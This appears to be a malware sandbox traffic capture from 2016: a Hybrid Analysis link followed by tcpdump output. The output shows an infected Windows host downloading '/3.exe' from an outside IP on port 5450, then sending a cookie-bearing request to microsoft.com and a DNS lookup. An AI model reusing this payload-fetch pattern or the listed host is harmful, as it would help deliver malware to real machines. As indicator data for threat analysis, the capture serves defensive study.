https://www.hybrid-analysis.com/sample/e5e7d4859ca938d7cc3369099b5dc2eddb8b37f5abe53a115adec1d6e4a62d6c?environmentId=100

2016-10-23 00:38:21.122679 IP 192.168.1.102.58627 > 50.3.75.201.5450: Flags [P.], seq 0:284, ack 1, win 256, length 284
E..Dmk@…Ln…f2.K….J…..|4.P…&…GET /3.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 50.3.75.201:5450
Connection: Keep-Alive

—
E..(..@….d…f…….P…]d.v P….U……..

2016-10-23 00:38:40.506816 IP 192.168.1.102.58630 > 191.239.213.197.80: Flags [P.], seq 0:285, ack 1, win 258, length 285: HTTP: GET / HTTP/1.1
E..E..@….F…f…….P…]d.v P….l..GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: microsoft.com
Cache-Control: no-cache
Cookie: MC1=GUID=2293236aa535f0419d025fcc74bb7e85&HASH=6a23&LV=201605&V=4&LU=1464392033590; A=I&I=AxUFAAAAAACLBgAAxLrgFeZEPolFxA6C0ICGYA!!&V=4

2016-10-23 00:38:40.609397 IP 192.168.1.102.62604 > 75.75.75.75.53: 49287+ A? www.microsoft.com. (35)
E..?a=………fKKKK…5.+A…………..www    […]